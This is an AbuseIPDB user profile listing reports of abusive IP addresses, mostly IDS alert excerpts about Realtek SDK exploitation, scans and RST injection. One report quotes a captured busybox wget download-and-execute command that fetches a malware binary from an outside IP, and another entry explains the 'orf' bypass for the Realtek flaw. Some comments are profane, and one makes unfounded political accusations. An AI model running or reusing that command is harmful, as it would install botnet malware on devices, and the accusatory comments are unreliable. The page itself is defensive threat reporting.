xxxDEV1xxx - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User xxxDEV1xxx joined AbuseIPDB in March 2022 and has reported 1,031 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇮🇪 20.50.73.10	01 Jun 2025	im not in fucking ireland, microsoft	Hacking Exploited Host
🇺🇸 65.49.1.196	01 May 2025	05/01/2025 06:26:36 1 IP-in-IP Attempted Administrator Privilege Gain 65.49.1.196 0 ... show more 05/01/2025 06:26:36 1 IP-in-IP Attempted Administrator Privilege Gain 65.49.1.196 0 0 1:2030388 ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free show less	Hacking Brute-Force Bad Web Bot SSH IoT Targeted
🇻🇳 163.61.110.122	30 Apr 2025	04/30/2025 02:41:29 1 UDP Attempted Administrator Privilege Gain 163.61.110.122 37197 ... show more 04/30/2025 02:41:29 1 UDP Attempted Administrator Privilege Gain 163.61.110.122 37197 9034 1:2044008 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394) show less	Hacking SQL Injection SSH IoT Targeted
🇹🇼 1.34.85.243	29 Apr 2025	ooh, illegal and urgent. fancy 04/28/2025 17:00:52 1 TCP Attempted Administrator Privilege Gain ... show more ooh, illegal and urgent. fancy 04/28/2025 17:00:52 1 TCP Attempted Administrator Privilege Gain 1.34.85.243 22865 16755 1:2027770 ET EXPLOIT Possible VXWORKS Urgent11 RCE Attempt - Illegal Urgent Flag show less	Hacking SQL Injection Brute-Force Web App Attack IoT Targeted
🇳🇱 204.76.203.80	28 Apr 2025	Connectionless Lightweight Directory Access Protocol LDAPMessage searchRequest(1) "<ROOT>" base ... show more Connectionless Lightweight Directory Access Protocol LDAPMessage searchRequest(1) "<ROOT>" baseObject messageID: 1 protocolOp: searchRequest (3) searchRequest baseObject: <MISSING> scope: baseObject (0) derefAliases: neverDerefAliases (0) sizeLimit: 0 timeLimit: 0 typesOnly: False Filter: (objectclass=*) filter: present (7) present: objectclass attributes: 0 items show less	Hacking
🇺🇸 34.117.59.81	27 Apr 2025	04/27/2025 09:59:49 2 TCP Device Retrieving External IP Address Detected 51835 34.117.59.8 ... show more 04/27/2025 09:59:49 2 TCP Device Retrieving External IP Address Detected 51835 34.117.59.81 443 1:2025331 ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io) show less	Hacking
🇺🇸 209.141.34.106	27 Apr 2025	orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://209.141.34.106/20oel/k03ldc.mpsl; chmod +x k03ldc ... show more orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://209.141.34.106/20oel/k03ldc.mpsl; chmod +x k03ldc.mpsl; ./k03ldc.mpsl realtek; # Breakdown: orf: Likely a no-op or typo, possibly part of a command chain or obfuscation. cd /tmp: Changes to the /tmp directory, a common location for temporary malicious files. rm -rf mpsl: Deletes any existing mpsl directory or file to avoid conflicts. /bin/busybox wget http://209.141.34.106/20oel/k03ldc.mpsl: Uses busybox (common on embedded systems like routers) to download a malicious binary from http://209.141.34.106/20oel/k03ldc.mpsl. chmod +x k03ldc.mpsl: Makes the binary executable. ./k03ldc.mpsl realtek: Executes the binary with the argument realtek, likely targeting Realtek-based devices (e.g., routers, IoT). show less	Hacking SQL Injection Brute-Force IoT Targeted
🇺🇸 13.33.21.127	27 Apr 2025	04/26/2025 21:07:10 2 TCP A system call was detected 13.33.21.127 443 17942 1:650 ... show more 04/26/2025 21:07:10 2 TCP A system call was detected 13.33.21.127 443 17942 1:650 INDICATOR-SHELLCODE x86 setuid 0 show less	Hacking
🇺🇸 147.203.255.20	25 Apr 2025	04/25/2025 05:45:54 3 UDP Detection of a Network Scan 147.203.255.20 41200 1900 1:19 ... show more 04/25/2025 05:45:54 3 UDP Detection of a Network Scan 147.203.255.20 41200 1900 1:1917 INDICATOR-SCAN UPnP service discover attempt show less	Port Scan Hacking
🇬🇧 146.66.213.44	25 Apr 2025	04/25/2025 01:08:37 1 UDP Attempted Administrator Privilege Gain 146.66.213.44 33960 ... show more 04/25/2025 01:08:37 1 UDP Attempted Administrator Privilege Gain 146.66.213.44 33960 9034 1:2044008 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394) show less	Hacking SQL Injection Brute-Force Web App Attack
🇵🇱 95.214.55.23	25 Apr 2025	04/25/2025 04:49:32 1 UDP Attempted Administrator Privilege Gain 95.214.55.23 40711 ... show more 04/25/2025 04:49:32 1 UDP Attempted Administrator Privilege Gain 95.214.55.23 40711 9034 1:2044008 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394) show less	Hacking SQL Injection Brute-Force Web App Attack
🇺🇸 209.141.59.46	25 Apr 2025	04/25/2025 05:28:49 1 UDP Attempted Administrator Privilege Gain 209.141.59.46 52354 ... show more 04/25/2025 05:28:49 1 UDP Attempted Administrator Privilege Gain 209.141.59.46 52354 9034 1:2044008 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394) show less	Hacking SQL Injection Brute-Force Web App Attack
🇺🇸 209.141.50.64	25 Apr 2025	04/24/2025 16:57:39 1 UDP Attempted Administrator Privilege Gain 209.141.50.64 40331 ... show more 04/24/2025 16:57:39 1 UDP Attempted Administrator Privilege Gain 209.141.50.64 40331 9034 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394) show less	Hacking SQL Injection Brute-Force Web App Attack IoT Targeted
🇳🇱 109.236.61.55	24 Apr 2025	04/24/2025 16:53:06 UDP Detection of a Network Scan 109.236.61.55 sport 61288 dport 1 ... show more 04/24/2025 16:53:06 UDP Detection of a Network Scan 109.236.61.55 sport 61288 dport 1900 INDICATOR-SCAN UPnP service discover attempt show less	Port Scan Hacking
🇬🇧 146.66.213.44	24 Apr 2025	04/24/2025 14:28:05 UDP Attempted Administrator Privilege Gain Source port 34658 Dest port 90 ... show more 04/24/2025 14:28:05 UDP Attempted Administrator Privilege Gain Source port 34658 Dest port 9034 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394) CVE-2021-35394 is a critical vulnerability in the Realtek Jungle SDK (versions v2.x up to v3.4.14B), specifically affecting the 'MP Daemon' diagnostic tool, compiled as the 'UDPServer' binary. It includes multiple memory corruption vulnerabilities and an arbitrary command injection flaw, allowing remote unauthenticated attackers to execute code. The command injection stems from a weak patch for a 2015 vulnerability, where commands prefixed with "orf" can bypass mitigation. Severity: Rated 9.8/10 on the CVSS 3.x scale show less	Port Scan Hacking SQL Injection Brute-Force Web App Attack
🇺🇸 167.94.138.128	24 Apr 2025	SURICATA IKE invalid proposal 04/24/2025 00:05:47 UDP 167.94.138.128 Source port:21098 Dest ... show more SURICATA IKE invalid proposal 04/24/2025 00:05:47 UDP 167.94.138.128 Source port:21098 Destination port:500 show less	Hacking
🇺🇸 69.194.240.13	23 Apr 2025	SURICATA STREAM suspected RST injection Source port:443 04/23/202 ... show more SURICATA STREAM suspected RST injection Source port:443 04/23/2025 15:01:46 Dest port:53962 04/23/2025 15:00:55 Dest port:53937 04/23/2025 15:00:52 Dest port:53923 A readup on the attack https://nets.ec/TCP-RST_Injection The window can be exploited to find the sequence number of a connection, and successfully inject a RST packet. RST packets are special because they can be taken OUT OF ORDER in a TCP stream. Therefore, if you can acquire the sequence number in an active connection, you can inject a RST packet and split the two connected parties. show less	DDoS Attack Port Scan Hacking Spoofing
🇺🇸 84.239.5.180	20 Jan 2025	Compromised VPN dhcp from Private Internet Access , for Salt Lake CA	DNS Compromise DNS Poisoning VPN IP Hacking
🇺🇸 104.244.42.1	22 Dec 2024	what this guy said a year ago, HAMAS, Terror-Organisation Malwares, Bitcoin Miners, Ransomware, Io ... show more what this guy said a year ago, HAMAS, Terror-Organisation Malwares, Bitcoin Miners, Ransomware, IoT Migrantifa HAMAS, Terror-Organisation Malwares, Bitcoin Miners, Ransomware, IoT Migrantifa, SHUT DOWN... show less	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇺🇸 104.244.42.66	22 Dec 2024	compromised For You feed coming through this IP.	Hacking
🇺🇸 104.244.42.65	22 Dec 2024	compromised For You feed coming through this IP.	Hacking
🇦🇺 40.79.173.40	18 May 2024	seeing as how i dont fucking live in Austrailia, this is highly suspicious for it to be communicatin ... show more seeing as how i dont fucking live in Austrailia, this is highly suspicious for it to be communicating with my computer with no VPN. Thankyou Microfucking soft? show less	DNS Compromise DNS Poisoning Hacking
🇰🇷 1.177.15.90	01 May 2024	5/1/24 14:47:24.47281 PST src port: 43705 dst port: 23	DNS Compromise Hacking SSH
🇬🇧 80.94.95.226	01 May 2024	5/1/24 14:47:23.202357 PST src port:54836 dst port: 23	DNS Compromise Hacking SSH
🇷🇺 163.181.1.161	30 Apr 2024	5 consecutive pings from this address ICMP type 8 4/30/24 20:51:16.658905 PST 4/30/24 20:51:17.659 ... show more 5 consecutive pings from this address ICMP type 8 4/30/24 20:51:16.658905 PST 4/30/24 20:51:17.659005 PST 4/30/24 20:51:18.659049 PST 4/30/24 20:51:19.658959 PST 4/30/24 20:51:20.660010 PST worthy of note, geo ip points to Russia, however the company is Zhenjiang, who is china and are the subject of my previous reports. ips connected are 103.102.230.2 103.56.61.144 27.11.3.231 220.130.163.172 show less	DNS Compromise DDoS Attack Ping of Death Hacking Spoofing Brute-Force SSH